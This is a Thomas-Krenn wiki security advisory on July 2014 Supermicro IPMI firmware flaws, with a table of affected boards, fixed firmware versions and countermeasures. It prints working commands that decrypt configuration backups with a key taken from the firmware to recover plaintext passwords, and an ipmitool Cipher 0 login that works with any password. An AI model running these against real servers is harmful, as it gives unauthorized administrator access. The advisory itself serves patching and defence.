Supermicro IPMI Security Updates July 2014

From Thomas-Krenn-Wiki
Jump to navigation Jump to search

Older IPMI firmware revisions of Supermicro motherboards are currently affected by multiple security vulnerabilities.

Thomas Krenn advises to protect IPMI interfaces with a firewall or VPN and not leave them publicly accessible on the Internet. Moreover it is important to update the IPMI firmware to the versions described below.

Common Security Practice

We recommend to protect administrative accesses such as IPMI or SSH with firewalls/VPNs and not expose them to public available networks like the Internet. Access shall be granted to authorized people only. This advice is common practice and independent from the vulnerabilities described later on.[1]

In addition to a dedicated firewall the Supermicro X7/X8/H8/X9/X10 motherboards with ATEN based IPMI are providing an integrade firewall to restrict remote management access (cf. Integrated IPMI Firewall of Supermicro Motherboards).

Affected motherboards and recommended firmware revisions

The following table is an overview about the security vulnerabilities and the corresponding affected motherboards as well as the recommended firmware revisions.

IPMI-Firmware for Affected motherboards from Thomas Krenn's portfolio Recommended Firmware Plaintext Login Credentials in save_config.bin NTP Amplification Unsafe String Functions[2] Plaintext Login Credentials exposed over UDP Port 49152[3] IPMI Authentication Bypass via Cipher 0[4]
X10-Mainboards
(ASPEED-ATEN)
1.42 or above
(SMT_X10_142.bin)
before 1.42[t 1] before 1.30[5] before 1.24 not affected[t 2] not affected[t 2]
X9-Mainboards
(Nuvoton-ATEN)
3.28 or above
(SMT_X9_328.bin)
before 3.28 before 3.20[6][7] before 3.17/3.15 before 3.15[t 3] before 1.58
X7/X8/H8-Mainboards
(Nuvoton-ATEN)
3.15 or above
(SMT_315.bin)
before 3.15[t 4] before 3.13[8] before 3.12 before 3.10[t 5] before 2.50
X9-Mainboards
(Renesas)
2.16 or above
(SMM_X9_2.16.0.ima)
not affected not affected not affected not affected before 2.16
X8-Mainboards
(Nuvoton-AMI)
2.20 or above
(X8..._220.ima - image depends on the motherboard)
not affected[t 6] not affected[t 7] not affected not affected[t 7] before 2.20
X7/H8-Mainboards
(AOC-SIM1U+/AOC-SIMSO+)
  • Single CPU: X7SBI, X7SBE, H8SMI-2
  • Dual CPU: X7DBE, X7DBR-3, X7DVL-E, H8DME-2
1.66 or above not affected not affected not affected not affected before 1.66

Test notes:

  1. In our tests firmware version 1.26 was affected, version 1.42 not.
  2. 2.0 2.1 Tested with firmware version 1.26 and 1.42.
  3. In our tests we could not exploit the vulnerability with firmware version 3.15.
  4. In our tests firmware version 2.66 (tested with X7SPE-HF), 3.10 and 3.14 (both tested with H8SCM-F) were affected, but version 3.15 not.
  5. In our tests firmware version 2.66 was affected (tested with X7SPE-HF), but version 3.10 not (tested with H8SCM-F)..
  6. The firmware has no save-config functionality.
  7. 7.0 7.1 Tested with firmware version 2.08 (X8DT3_208.ima).

Update IPMI Firmware

The corresponding firmware images for your server are located at the Downloads section.

Please find the instructions on how to update the firmware at:

Attention: If you choose to keep your current IPMI configuration (by checking the box "Preserve Configuration", unckecking this option will restore the factory default setting of BMC) you will have to re-save the NTP configuration in the web interface to close the NTP vulnerability.

Unchecking the box resets the IPMI module to its factory defaults and IP adresses and all other settings must be configured again. This can be done with ipmicfg, BIOS or other tools - cf. IPMI Configuration for Supermicro Systems (Exception: the X10SLH-F keeps its settings when updating to firmware 1.42).

Further Informations about the Vulnerabilities

The following sections provide detailed informations for the the security problems.

Plaintext Login Credentials in save_config.bin

From IPMI configuration backups (save_config.bin) it is possible to extract plaintext login credentials. The configuration backups are encrpyted, nevertheless the public available firmware files reveal the secret encryption key.[9]

The following commands show how to extract login credentials:

~/tmp/ipmi$ binwalk SMT_X9_315.bin
~/tmp/ipmi$ dd if=SMT_X9_315.bin bs=1 skip=1572864 count=8372224 of=cramfs1
~/tmp/ipmi$ dd if=SMT_X9_315.bin bs=1 skip=12058624 count=1945600 of=cramfs2
~/tmp/ipmi$ sudo mount -o loop -t cramfs cramfs1 mnt1
~/tmp/ipmi$ strings mnt1/bin/ipmi_conf_backup_tool | grep -A 1 -B 1 -m 1 openssl
CKSAM1SUCKSAM1SUASMUCIKSASMUCIKS
~/tmp/ipmi$ openssl aes-256-cbc -d -in save_config.bin -out backup.bin.dec -k CKSAM1SUCKSAM1SUASMUCIKSASMUCIKS -md md5
~/tmp/ipmi$ dd skip=6 bs=1 status=none if=backup.bin.dec of=backup.tar.gz
~/tmp/ipmi$ tar xzf backup.tar.gz
~/tmp/ipmi$ ack-grep -i passwd preserve_config
    preserve_config/ps.xml
    5:      <User num="0" enable="01" PasswdSize="00" Name="" Passwd="admin"
    ChannelAccess="00000000000000000000000000000000" PrivilegeChange="00">
    9:      <User num="1" enable="01" PasswdSize="00" Name="ADMIN" Passwd="**********"
    ChannelAccess="00540054000000000000000000000000" PrivilegeChange="00">

Consequences

An attacker with access to a configuration backup can extract the login credentials and directly use username and password. Actually the encryption of the backup file is not an effective security protection.

Countermeasures

Possible countermeasures:

  1. Update the firmware to an revision described above.
  2. Secure safekeeping of configuration backups. Backups can only be created by IPMI admin users. If access to the configuration backup files is restricted, the login credentials cannot be extracted.

NTP Amplification

NTP servers with activated monlist support can be driven to send immense responses on single requests.[10] The monlist feature usually provides a list of up to 600 IP address entries the NTP had contact to. That amount of response data can be redirected to a target victim by IP spoofing.[11] [12] Therefore so called NTP amplification attacks can be the basis for a Denial of Server (DoS) attack.

The ntpdc commands checks from a remote Linux administration machine, if a specific server (in this example 192.0.2.1) supports the monlist feature:

$ ntpdc -n -c monlist 192.0.2.1
remote address          port local address      count m ver rstr avgint  lstint
===============================================================================
192.0.2.2              40506 192.0.2.5          1 7 2      0      0      0

Deactivation monlist results in the following output:

$ ntpdc -n -c monlist 192.0.2.1
***Server reports data not found

Deactivation NTP results in the following output:

$ ntpdc -n -c monlist 192.0.2.1
ntpdc: read: Connection refused

Consequences

An attacker can send spoofed requests to a NTP server with monlist feature and carry a DoS attack on a third involved host.

Countermeasures

Possible Countermeasures:

  1. Update the firmware to an revision described above. If on upgrading the IPMI configuration has been kept, consider to re-save the NTP configuration ( Configuration -> Date & Time in the web interface, this disables monlist) .
  2. Disable NTP (select Configuration -> Date & Time an check NTP Disable, then press save).

Unsafe String Functions

Multiple CGI scripts suffer from using unsafe string methods an can be exploited by buffer overflow attacks.

Consequences

If a buffer overflow attack succeeds, arbitrary commands with root privileges can be executed.[13][14]

Countermeasures

Possible Countermeasures:

  1. Update the firmware to an revision described above.

Plaintext Login Credentials exposed over UDP Port 49152

Older IPMI firmware versions reveal cleartext login credentials over UDP port 49152.[15][16]

Consequences

An attacker with access to port 49152 of the IPMI IP address can send a GET /PSBlock request with getting username and password as response.

Countermeasures

Possible Countermeasures:

  1. Update the firmware to an revision described above.

IPMI Authentication Bypass via Cipher 0

A severe flaw of the IPMI 2.0 specification (Cipher Type 0) allows an authentication with any password.[17]

The following command checks if Cipher 0 is available at an IPMI interface:

$ ipmitool -H 192.0.2.1 -U ADMIN -P ***** lan print|grep 'Cipher Suites'
RMCP+ Cipher Suites     : 1,2,3,6,7,8,11,12,0

A 0 in the RMCP+ Suites line states that Cipher 0 can be used. Then authentication can be bypassed - any password grants access:

$ ipmitool -I lanplus -C 0 -H 192.0.2.1 -U ADMIN -P FluffyWabbit user list
ID  Name	     Callin  Link Auth	IPMI Msg   Channel Priv Limit
2   ADMIN            false   false      true       ADMINISTRATOR
3   monitor          true    true       true       USER
[...]

Consequences

If for an attacker it is possible to user Cipher 0, authentication as IPMI administrator with any password is possible.

Countermeasures

Possible Countermeasures:

  1. Update the firmware to an revision described above.

Einzelnachweise

  1. Best Practices for managing servers with IPMI features enabled in Datacenters (www.supermicro.com)
  2. Firmware Fixes to Common Vulnerabilities and Exposures (www.supermicro.com)
  3. Supermicro motherboards with clear text passwords are found. What are the recommended F/W patches? (Supermicro FAQ 18897, 24.06.2014)
  4. I read an article where Supermicro BMC (IPMI) security can be breached through UPnP and through Cipher 0 mechanisms. How do I avoid such issues? (Supermicro FAQ 16536, 08.07.2013)
  5. We have received complaints of our SM IPMI cards being used for NTP DOS attacks. (Supermicro FAQ 17997, 03.02.2014)
  6. I have one of the Supermicro X9 motherboards. IPMI BMCs that have NTP enabled are being abused for NTP amplification DDoS attacks. Is there a fix for this? (Supermicro FAQ 17843, 14.01.2014)
  7. According to recent NTP Amplification Attacks, I found that firmware of motherboards X9SCA-F is vulnerable. (Supermicro FAQ 17908, 14.01.2014)
  8. I was alerted to the fact that the IP assigned to the IPMI of the X7SPE-HF-D525 was vulnerable. (Supermicro FAQ 18000, 03.02.2014)
  9. Securing SuperMicro’s IPMI with OpenVPN (michael.stapelberg.de)
  10. Technical Details Behind a 400Gbps NTP Amplification DDoS Attack (blog.cloudflare.com)
  11. IP Spoofing (en.wikipedia.org)
  12. NTP Amplification Attacks Using CVE-2013-5211 (us-cert.gov)
  13. Supermicro IPMI Firmware Vulnerabilities (community.rapid7.com)
  14. Exploiting the Supermicro Onboard IPMI Controller (community.rapid7.com)
  15. CARISIRT: Yet Another BMC Vulnerability (And some added extras) (blog.cari.net, 19.06.2014)
  16. Supermicro Motherboards IPMI Interface Discloses Passwords to Remote Users (securitytracker.com Alert ID 1030453, 20.06.2014)
  17. The Infamous Cipher 0 (fish2.com)

Author: Georg Schönberger

Foto Werner Fischer.jpg

Author: Werner Fischer

Werner Fischer, working in the Knowledge Transfer team at Thomas-Krenn, completed his studies of Computer and Media Security at FH Hagenberg in Austria. He is a regular speaker at many conferences like LinuxTag, OSMC, OSDC, LinuxCon, and author for various IT magazines. In his spare time he enjoys playing the piano and training for a good result at the annual Linz marathon relay.


Related articles

Adaptec RAID Monitoring Plugin for Windows Server 2012 set-up
Git-annex detailed information
Installing Strawberry Perl in Windows